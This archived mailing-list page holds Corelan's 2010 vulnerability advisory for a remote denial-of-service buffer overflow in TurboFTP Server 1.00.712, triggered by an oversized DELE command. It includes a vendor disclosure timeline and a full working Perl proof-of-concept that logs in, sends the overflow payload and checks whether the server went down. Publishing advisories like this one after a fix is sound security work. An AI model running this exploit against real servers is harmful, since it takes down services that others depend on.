lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <C0641B79F7D6A44791BA8FA35BC143F90153A1A66DB9@apollo.corelan.be>
Date: Tue, 12 Jan 2010 20:25:54 +0100
From: Security <security@...elan.be>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>,
	"secalert@...urityreason.com" <secalert@...urityreason.com>,
	"bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
	"vuln@...unia.com" <vuln@...unia.com>
Cc: Corelan Team <Corelan.Team@...elan.be>
Subject: [CORELAN-10-004]  TurboFTP Server 1.00.712 remote DoS

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@...elan.be |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory        : CORELAN-10-004
Disclosure date : Jan 12, 2010
Corelan Reference :
http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-004-turboftp-server-1-00-712-dos/


0x00 : Vulnerability information
--------------------------------

[*] Product : Turbo FTP Server
[*] Version : 1.00.712 
[*] Vendor : turbosoft inc
[*] URL : http://www.tbsoftinc.com
[*] Platform : Windows
[*] Type of vulnerability : Buffer overflow - DoS
[*] Risk rating : Medium
[*] Issue fixed in version : 1.00.720
[*] Vulnerability discovered by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
[*] Greetings to : EdiStrosar, rick2600, mr_me, ekse & MarkoT from Corelan Team


0x01 : Vendor description of software
-------------------------------------
>From the vendor website:

TurboFTP Server is a high performance, secure, scalable and management 
friendly file transfer server running on Windows platforms. With it you 
can easily set up a secure file transfer server that delivers regular FTP, 
FTP over SSL/TLS, and SFTP over SSH services with virtual domains, 
advanced directory access control, virtual folders, IP access control, 
flexible authentication options and many other features. 



0x02 : Vulnerability details
----------------------------
The "Turbo FTP Server" ftp service is vulnerable to a buffer overflow, 
allowing a malicious person to trigger a Denial Of Service condition
against this service.

In order to trigger the vulnerability, the remote client needs to be able
to login and issue an specially crafted DELE command.

Note that other commands may be vulnerable too.




0x03 : Vendor communication
---------------------------
[*] Dec 30, 2009 : Issue found
[*] Jan 1st, 2010 : contacted vendor
[*] Jan 1st, 2010 : vendor opened support ticket
[*] Jan 4th, 2010 : vendor asked for PoC code
[*] Jan 4th, 2010 : Poc Code sent
[*] Jan 7th, 2010 : Vendor acknowledged issue and starts fixing issue
[*] Jan 11th, 2010 : vendor released fixed version
[*] Jan 12th, 2010 : Public disclosure

Release notes (on Vendor website):

  V 1.00 Build 720 - Jan 11, 2010

  [-] Buffer overflow problems reported by Corelan Team.
  [-] A file open problem causing WinSCP failed to upload files.
  [-] A problem in log recycling causes server to stall. 



0x04 : Exploit/PoC
------------------
# Exploit Title : TurboFTP Server 1.00.712 Remote DoS
# Date          : 30 december 2009
# Author        : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Bug found by  : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe
# Version       : 1.00.712
# Issue fixed in: 1.00.720
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : DoS
# Greetz to     : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
print "|------------------------------------------------------------------|\n";
print "|                         __               __                       |\n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |\n";
print "|  / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\   / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/   \\___/_/\\__,_/_/ /_/   \\__/\\___/\\__,_/_/ /_/ /_/  |\n";
print "|                                                                  |\n";
print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] DoS exploit for TurboFTP Server 1.00.712 \n";

use IO::Socket; 

if ($#ARGV ne 3) { 
print "\n  usage: $0 <targetip> <targetport> <user> <password>\n"; 
exit(0); 
} 

my $user=$ARGV[2];
my $pass=$ARGV[3];

print " [+] Preparing DoS payload\n";
my $payload = "A" x 2000;
print " [+] Connecting to server $ARGV[0] on port $ARGV[1]\n";
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => $ARGV[1], 
                              Proto    => 'tcp'); 

$ftp = <$sock> || die " [!] *** Unable to connect ***\n"; 
print "   ** $ftp";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Logging in (user $user)\n";
print $sock "USER $user\r\n"; 
$ftp = <$sock>;
print "   ** $ftp";
print $sock "PASS $pass\r\n"; 
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Sending payload\n";
print $sock "DELE ".$payload."\r\n";
$ftp = <$sock>;
print "   ** $ftp";
print " [+] Payload sent, now checking FTP server state\n";
$sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => $ARGV[1], 
                              Proto    => 'tcp'); 
my $ftp2 = <$sock2> || die " [+] DoS successful\n";
print " [!] DoS did not seem to work\n";
print "   ** $ftp2\n";





Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ